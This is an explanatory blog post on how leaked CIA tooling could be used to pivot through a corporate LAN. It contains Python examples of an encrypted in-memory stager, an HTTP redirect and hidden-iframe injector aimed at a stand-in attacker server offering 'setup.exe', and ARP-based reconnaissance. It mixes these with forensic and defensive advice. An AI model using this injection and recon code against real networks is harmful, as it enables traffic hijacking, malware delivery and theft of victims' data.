What the CIA does on a target's Local Area Network
Based on the WikiLeaks Vault 7 leak of CIA tools and documents, we can imagine what a CIA data exfiltration attack on a corporate network looks like. I'm going to focus on the local network activity, so let's say there is already a compromised computer in the LAN that will be used as a pivot to further exploit the target organization. That foothold could have been gained by an employee visiting a CIA exploitation server that uses browser 0-days, or by opening a maliciously crafted document that exploits a reader vulnerability. Even if that fails, the agent could compromise the router (the leak includes an RCE proof of concept said to affect over 300 Cisco models) or attack the WiFi to get into the LAN.
The arsenal is made of many building blocks that let agents assemble the right tool for the job without unnecessary parts. When a computer is first compromised, only the core backdoor functionality is planted. Only when a certain action is required is the corresponding module delivered into process memory just in time, executed and discarded. This way the malicious code never touches the disk in usable form and does not persist on the target's machine, which helps a lot against antivirus and makes the program very difficult to reverse engineer. I will first describe the main building blocks our fictional attack relies on. The specific tools would vary with the target operating system, but the principles would be the same.
The core backdoor that waits for payloads is dubbed AfterMidnight, and the payloads are called Gremlins. Let's say the controlled machine in the target LAN has AfterMidnight.dll and the AfterMidnight Core on disk. Follow the diagram below as you read about this tool.
The DLL is unencrypted and looks as innocent as possible. It persists as a Windows service DLL running inside the netsvcs svchost.exe process, and this stager locates the AfterMidnight Core on disk and loads it into memory. For a defender this is the one durable artifact: a service hosted by svchost.exe is registered through the ServiceDll value under HKLM\SYSTEM\CurrentControlSet\Services\<service>\Parameters, so an unsigned or unfamiliar DLL registered that way for the netsvcs group is worth a look.
The Core handles the encrypted networking and is driven by a custom configuration that defines where and how often to report to the Command & Control server (Octopus). That server can be a real server on the WAN or even another Gremlin on another machine.
The first thing the Core expects is the Master Gremlin, which is essentially the procedure plan together with the encryption key. Note that the encryption key never touches the disk, and in most cases (including ours) neither does the Master Gremlin.
When the scheduled time comes, the Master first downloads any needed Gremlins and stores them on disk encrypted with that key. Now everything is ready and the plan begins: Gremlins are loaded into memory as needed according to the plan and deleted once they are no longer required. Reconstructing what was done from a disk image alone is therefore very hard, since the blobs are useless without the key. It is not impossible, though: the key and any decrypted Gremlin are in the Core's memory while it runs, so a memory capture of the hosting svchost.exe process, or the C2 traffic, is the realistic evidence source.
The following diagram shows it clearly:
In this fictional mission AfterMidnight is both the program controlling the pivot and the program to be installed on the target machine. We own one computer with it, and we can load another weapon as a Gremlin to compromise the target.
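To make the staging model concrete, here is an added Python illustration (my own example, not AfterMidnight's code, whose internals the leak does not spell out at this level). It keeps the key only in a Core object, writes modules to disk sealed, decrypts them into memory on demand and removes the file afterwards; the `demo()` function then compares what a disk image alone yields against a disk image plus a key recovered from process memory. The cipher is a toy SHA-256 keystream with an HMAC tag, chosen so the example runs on the standard library alone; the module bytes and file name are constructed.

```python
# Added illustration (not AfterMidnight's own code): a stager that keeps the
# payload key only in memory, writes modules to disk encrypted, decrypts them
# into memory on demand and wipes them afterwards. The cipher is a toy
# SHA-256-keystream + HMAC construct so the example runs on the standard
# library alone; it stands in for whatever the real tool uses.
import hashlib
import hmac
import os
import tempfile


def _keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Toy counter-mode keystream: SHA-256(key || nonce || counter) blocks."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce + counter.to_bytes(4, "big")).digest()
        counter += 1
    return bytes(out[:length])


def seal(key: bytes, plaintext: bytes) -> bytes:
    """Encrypt-then-MAC a module: nonce(16) || ciphertext || HMAC-SHA256 tag(32)."""
    nonce = os.urandom(16)
    ct = bytes(a ^ b for a, b in zip(plaintext, _keystream(key, nonce, len(plaintext))))
    tag = hmac.new(key, nonce + ct, hashlib.sha256).digest()
    return nonce + ct + tag


def open_blob(key: bytes, blob: bytes) -> bytes:
    """Verify the tag, then decrypt; raises ValueError on a wrong key or tampering."""
    nonce, ct, tag = blob[:16], blob[16:-32], blob[-32:]
    expected = hmac.new(key, nonce + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("bad tag")
    return bytes(a ^ b for a, b in zip(ct, _keystream(key, nonce, len(ct))))


class Core:
    """Simulated AfterMidnight-style core: the key lives only in this object."""

    def __init__(self, staging_dir: str):
        self.staging_dir = staging_dir
        self.key = None  # delivered by the Master Gremlin, never written to disk

    def receive_master(self, key: bytes) -> None:
        self.key = key

    def stage(self, name: str, module: bytes) -> str:
        """The download-and-store step: the module reaches disk only sealed."""
        path = os.path.join(self.staging_dir, name)
        with open(path, "wb") as f:
            f.write(seal(self.key, module))
        return path

    def run(self, name: str) -> bytes:
        """Decrypt into memory, then remove the on-disk copy."""
        path = os.path.join(self.staging_dir, name)
        with open(path, "rb") as f:
            module = open_blob(self.key, f.read())
        os.remove(path)
        return module  # a real tool would execute this in-process; we return it


def _try_open(key: bytes, blob: bytes):
    """Decrypt attempt that reports failure as None instead of raising."""
    try:
        return open_blob(key, blob)
    except ValueError:
        return None


def demo() -> dict:
    """Stage one module, run it, and compare what disk vs. memory evidence yields."""
    module = b"gremlin: collect files matching *.docx"  # constructed stand-in payload
    with tempfile.TemporaryDirectory() as d:
        core = Core(d)
        core.receive_master(os.urandom(32))
        path = core.stage("g1.bin", module)
        with open(path, "rb") as f:
            disk_image = f.read()        # what a disk acquisition preserves
        memory_dump_key = core.key       # what a process memory capture preserves
        executed = core.run("g1.bin")
        return {
            "disk_leaks_plaintext": module in disk_image,
            "ran_correct_module": executed == module,
            "file_removed": not os.path.exists(path),
            "disk_alone_recovers": _try_open(os.urandom(32), disk_image) is not None,
            "disk_plus_memory_key_recovers": _try_open(memory_dump_key, disk_image) == module,
        }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The last two entries of the `demo()` result are the forensic point: the sealed file on its own is noise, but the same file together with the key pulled from the running process decrypts cleanly, so a live memory capture is worth far more than a post-mortem disk image against this kind of tooling.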
Archimede, the new version of Fulcrum, is a tool that lets a controlled machine pivot through the LAN. It monitors the target machine's HTTP traffic and redirects the target to the provided URL when the configured conditions are met. It is not an exploit or a payload, but simply a man-in-the-middle tool that makes sure a victim on the same LAN reaches a URL of the attacker's choice. The setup of the two tools is the same, but Archimede also supports iframe injection, which might be useful if the plain redirect is blocked. Note that both methods only work on cleartext HTTP: the tool has to read and rewrite the response, which it cannot do for TLS without a certificate the victim's browser trusts for that site.
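The decision logic such an injector needs, as an added Python example (mine, not Fulcrum's or Archimede's code): the user-agent whitelist and blacklist, a URL trigger of the kind used later in this post (a request path containing "download"), a content-type filter, and the two injection methods, a 302 redirect that replaces the response and a hidden iframe spliced into the real HTML. The `Policy` fields, the sample request and response, and the 192.0.2.10 documentation address standing in for the attacker's LAN server are all constructed for the example.

```python
# Added illustration of the decision logic a Fulcrum/Archimede-style HTTP
# injector needs (not the tool's code): user-agent allow/deny lists, a URL
# trigger, a content-type filter and two injection methods. The policy
# field names and the sample request/response are constructed.
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple


@dataclass
class Policy:
    inject_url: str                         # where the victim should end up
    method: str = "redirect"                # "redirect" or "iframe"
    url_trigger: Optional[str] = None       # substring the request path must contain
    ua_whitelist: List[str] = field(default_factory=list)
    ua_blacklist: List[str] = field(default_factory=list)
    content_types: Tuple[str, ...] = ("text/html",)


def parse_request(raw: bytes) -> dict:
    """Minimal HTTP/1.x request parser: method, path and lower-cased headers."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers}


def should_inject(req: dict, policy: Policy) -> bool:
    """Trigger and user-agent rules: blacklist wins, whitelist (if any) must match."""
    if req["method"] != "GET":
        return False
    ua = req["headers"].get("user-agent", "")
    if any(bad in ua for bad in policy.ua_blacklist):
        return False
    if policy.ua_whitelist and not any(good in ua for good in policy.ua_whitelist):
        return False
    if policy.url_trigger and policy.url_trigger not in req["path"]:
        return False
    return True


def redirect_response(policy: Policy) -> bytes:
    """Drop the real response and answer with a 302 to the injected URL."""
    return (f"HTTP/1.1 302 Found\r\nLocation: {policy.inject_url}\r\n"
            f"Content-Length: 0\r\nConnection: close\r\n\r\n").encode()


def iframe_response(original: bytes, policy: Policy) -> Optional[bytes]:
    """Keep the real HTML but add a hidden iframe; None if the response is not injectable."""
    head, sep, body = original.partition(b"\r\n\r\n")
    ctype = re.search(rb"(?im)^content-type:\s*([^;\r\n]+)", head)
    if not ctype or ctype.group(1).strip().decode().lower() not in policy.content_types:
        return None
    if re.search(rb"(?im)^transfer-encoding:\s*chunked", head):
        return None  # chunked bodies need re-framing; rewriting them blindly breaks the page
    tag = (f'<iframe src="{policy.inject_url}" width="0" height="0" '
           f'style="display:none"></iframe>').encode()
    idx = body.lower().rfind(b"</body>")
    new_body = body[:idx] + tag + body[idx:] if idx != -1 else body + tag
    head = re.sub(rb"(?im)^content-length:[^\r\n]*",
                  b"Content-Length: %d" % len(new_body), head)
    return head + sep + new_body


def handle(raw_request: bytes, raw_response: bytes, policy: Policy) -> Tuple[str, bytes]:
    """Decide per request: pass through, redirect, or rewrite with an iframe."""
    req = parse_request(raw_request)
    if not should_inject(req, policy):
        return ("pass", raw_response)
    if policy.method == "redirect":
        return ("redirect", redirect_response(policy))
    injected = iframe_response(raw_response, policy)
    return ("iframe", injected) if injected is not None else ("pass", raw_response)


# Constructed sample traffic; 192.0.2.10 is a documentation address standing in
# for the attacker-controlled server on the LAN.
POLICY = Policy(inject_url="http://192.0.2.10/download/setup.exe", url_trigger="download",
                ua_whitelist=["Windows"], ua_blacklist=["curl", "Wget"])
SAMPLE_REQUEST = (b"GET /files/download?id=7 HTTP/1.1\r\nHost: example.test\r\n"
                  b"User-Agent: Mozilla/5.0 (Windows NT 6.1) Firefox/45.0\r\n\r\n")
SAMPLE_RESPONSE = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html; charset=utf-8\r\n"
                   b"Content-Length: 42\r\n\r\n<html><body><p>Downloads</p></body></html>")

if __name__ == "__main__":
    print(handle(SAMPLE_REQUEST, SAMPLE_RESPONSE, POLICY))
```

Two details matter in practice and are the reason the manual asks for user-agent lists and content-type modifications up front: a redirect fired at a non-browser client (an updater, a scanner) is wasted and noisy, and an iframe pushed into a non-HTML or chunked response corrupts the page the victim sees, which is exactly the kind of glitch that gets reported to a helpdesk.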
Grasshopper is the framework for creating highly customized payloads for Windows machines. It provides the ability to build the perfect Master Gremlin and Gremlins from the information gathered. Grasshopper allegedly shines at adapting to the personal security products (PSPs) that Windows users tend to have installed.
Both AfterMidnight and Grasshopper use a Python 3.4 interpreter, and everything seems compatible with everything else. I really like the concept of building specialized weapons that come and go without a footprint.
Now that you know our payload (AfterMidnight) and the attack vector tool (Archimede) pretty well, the rest will be described as we go.
Fun starts here
We have the pivot machine, and I'm thinking about loading Archimede as a Gremlin to start a man-in-the-middle attack. The Archimede manual clearly allows creating a DLL payload with predefined parameters, which can be used as a Gremlin. Let's prepare it (the quoted manual says Fulcrum, but it's probably the same in Archimede).
So you are just itching to use Fulcrum against this target of yours and you’re ready to dive in! Hang on there partner. First we need to gather the following information before we can build a deployment package:
1. The MAC address of the LANside interface of the gateway
2. The MAC address of the target machine
3. The URL to inject into the HTTP response
4. The Injection method of the HTTP response
5. The character set of the pivot machine
6. Any user agent string whitelist entries
7. Any user agent string blacklist entries
8. Any target content type modifications
9. Whether the pivot machine is a laptop or a desktop
10. The OS version of the pivot machine
11. The bitness of the process Fulcrum will run in
12. The privilege level of the process Fulcrum will run in
13. What PSPs are present on the pivot machine
14. How the Fulcrum files will be delivered to the pivot machine
15. Where the Fulcrum files will be deployed to on the pivot machine’s file system
16. When Fulcrum should be delivered to the pivot machine
17. How Fulcrum will be started on the pivot machine
18. When Fulcrum should be started
19. If Fulcrum should be automatically restarted
20. When Fulcrum should be shut down
21. When Fulcrum should be removed
Technical options first: we can use Grasshopper to build a DLL (Gremlin) that collects the technical information. More specifically, the so-called Alpha Gremlin, a custom scripting engine, lets us programmatically find out the gateway and target MAC addresses, OS version, bitness, character set and present PSPs. With that in hand we can run a basic sniffer and MitM.
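What that collection step looks like for items 1, 2, 5, 10 and 11 of the checklist, as an added Python example (mine, not the Alpha Gremlin): the gateway address is parsed from `ipconfig` output, the gateway and target MACs from the pivot's own ARP cache (`arp -a`), and the character set, OS version and process bitness come from the standard library. The `ipconfig` and `arp -a` text below is constructed sample Windows output with made-up addresses so the parsers run offline on any OS; PSP detection is deliberately not covered, since the page says nothing about how the tool does it.

```python
# Added illustration (not the Alpha Gremlin itself) of the host-side recon a
# pivot needs before an Archimede/Fulcrum deployment: gateway and target MAC
# from the pivot's ARP cache, plus OS version, bitness and character set.
import locale
import platform
import re
import struct
import subprocess

# Constructed sample output of `ipconfig` and `arp -a` on a Windows pivot; the
# addresses are made up so the parsers run offline on any OS.
SAMPLE_IPCONFIG = """\
Windows IP Configuration

Ethernet adapter Ethernet:

   Connection-specific DNS Suffix  . : corp.example
   IPv4 Address. . . . . . . . . . . : 192.168.1.10
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.1.1
"""

SAMPLE_ARP = """\
Interface: 192.168.1.10 --- 0xb
  Internet Address      Physical Address      Type
  192.168.1.1           00-11-22-33-44-55     dynamic
  192.168.1.23          aa-bb-cc-dd-ee-ff     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
"""

# Matches the Windows layout above as well as the Linux/macOS "? (ip) at mac" layout.
_ARP_LINE = re.compile(
    r"(\d{1,3}(?:\.\d{1,3}){3})\)?\s+(?:at\s+)?([0-9a-fA-F]{2}(?:[-:][0-9a-fA-F]{2}){5})")


def default_gateway(ipconfig_text: str):
    """Item 1 needs the gateway's IP first; pull it from the ipconfig dotted line."""
    m = re.search(r"Default Gateway[ .]*:\s*(\d{1,3}(?:\.\d{1,3}){3})", ipconfig_text)
    return m.group(1) if m else None


def arp_table(arp_text: str) -> dict:
    """IP -> MAC (lower-case, colon separated) for every entry in the ARP cache."""
    table = {}
    for m in _ARP_LINE.finditer(arp_text):
        table[m.group(1)] = m.group(2).lower().replace("-", ":")
    return table


def resolve_macs(gateway_ip: str, target_ip: str, arp_text: str) -> dict:
    """Items 1 and 2 of the checklist. A None value means the host is not in the
    cache: the pivot has not talked to it yet, and provoking an entry (a ping, an
    ARP request) is a visible action rather than passive collection."""
    table = arp_table(arp_text)
    return {"gateway_mac": table.get(gateway_ip), "target_mac": table.get(target_ip)}


def local_facts() -> dict:
    """Items 5, 10 and 11: character set, OS version and bitness of this process."""
    return {
        "charset": locale.getpreferredencoding(False),
        "os": platform.platform(),
        "bitness": struct.calcsize("P") * 8,  # pointer size of the process, not the OS
    }


def live_arp_text() -> str:
    """Real ARP cache of this host, or "" if the arp utility is not available."""
    try:
        return subprocess.run(["arp", "-a"], capture_output=True, text=True,
                              check=False).stdout
    except FileNotFoundError:
        return ""


if __name__ == "__main__":
    gw = default_gateway(SAMPLE_IPCONFIG)
    print(gw, resolve_macs(gw, "192.168.1.23", SAMPLE_ARP), local_facts())
```

The bitness returned is that of the Python process, which is the value the checklist actually asks for (item 11, the process Fulcrum will run in), and the missing-entry case in `resolve_macs` is the one to plan around: a target the pivot has never exchanged packets with has no ARP entry, so getting its MAC means sending something.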
We will start immediately and run the MitM to gather information about the victim's browser and OS from their internet traffic. Timing options will follow Archimede's "fire and forget" recommendation: everything except the Core will be removed from the pivot once the mission is done. Grasshopper will make sure we don't upset the pivot's PSP, which is nice. The remaining options are not needed for this first MitM; we first gather more information with the basic sniffer and MitM functionality.
This is the point where most of these attacks diverge, so let's analyze the best and the worst case.
Best case: the agent has a 0-day for some technology the target uses, e.g. the person runs a vulnerable browser or OS. The agent would configure Archimede to redirect the first HTTP GET request to a server on the LAN, which is another Gremlin on the pivot. That Gremlin would simply deliver the AfterMidnight Core through that exploit.
Worst case: the target is not using any exploitable technology and has also configured the browser to block all plain HTTP traffic (an HTTPS-only browser mode has the same effect, and HSTS already gives individual sites that protection).
Global adversaries such as the CIA certainly have access to many legitimate TLS certificates, which would be used here to make a realistic HTTPS server that offers AfterMidnight to our victim. One caveat: a certificate is only valid for the names it was issued for, so the MitM still cannot transparently impersonate the site the victim asked for; the redirect has to land on an attacker-controlled name with a matching certificate. That is why we now need to exploit the human, and these methods depend on user interaction. If one social engineering attack fails, we can just try another trick until we succeed.
We would configure a new Archimede Gremlin to perform the MitM and another Gremlin to serve as the HTTPS server. Once Archimede sees "download" in a requested URL, it would redirect the target to our Gremlin server, which hosts a copy of the requested website with all downloads available but with the AfterMidnight installer bundled in. The target becomes a victim once they open the downloaded executable. I assume most people don't check the integrity checksums when downloading over SSL. A checksum published on the same page would be replaced on the clone anyway; only a hash obtained through a separate channel, or a code signature the operating system verifies before running the file, catches this.
Now we destroy everything except the AfterMidnight Core on the first pivot and repeat the information gathering with the Alpha Gremlin on the new machine. Based on what it reports, we load Gremlins built for that system and its personal security product, which transfer the interesting files to the Hive. If needed, we can load Gremlins for recording keyboard, microphone, webcam, screen activity etc.
If you enjoyed reading this, I highly recommend diving into Vault 7; it will keep you entertained for hours. Perhaps take a look at the more persistent, kernel-level payloads such as those found in the Dark Matter section.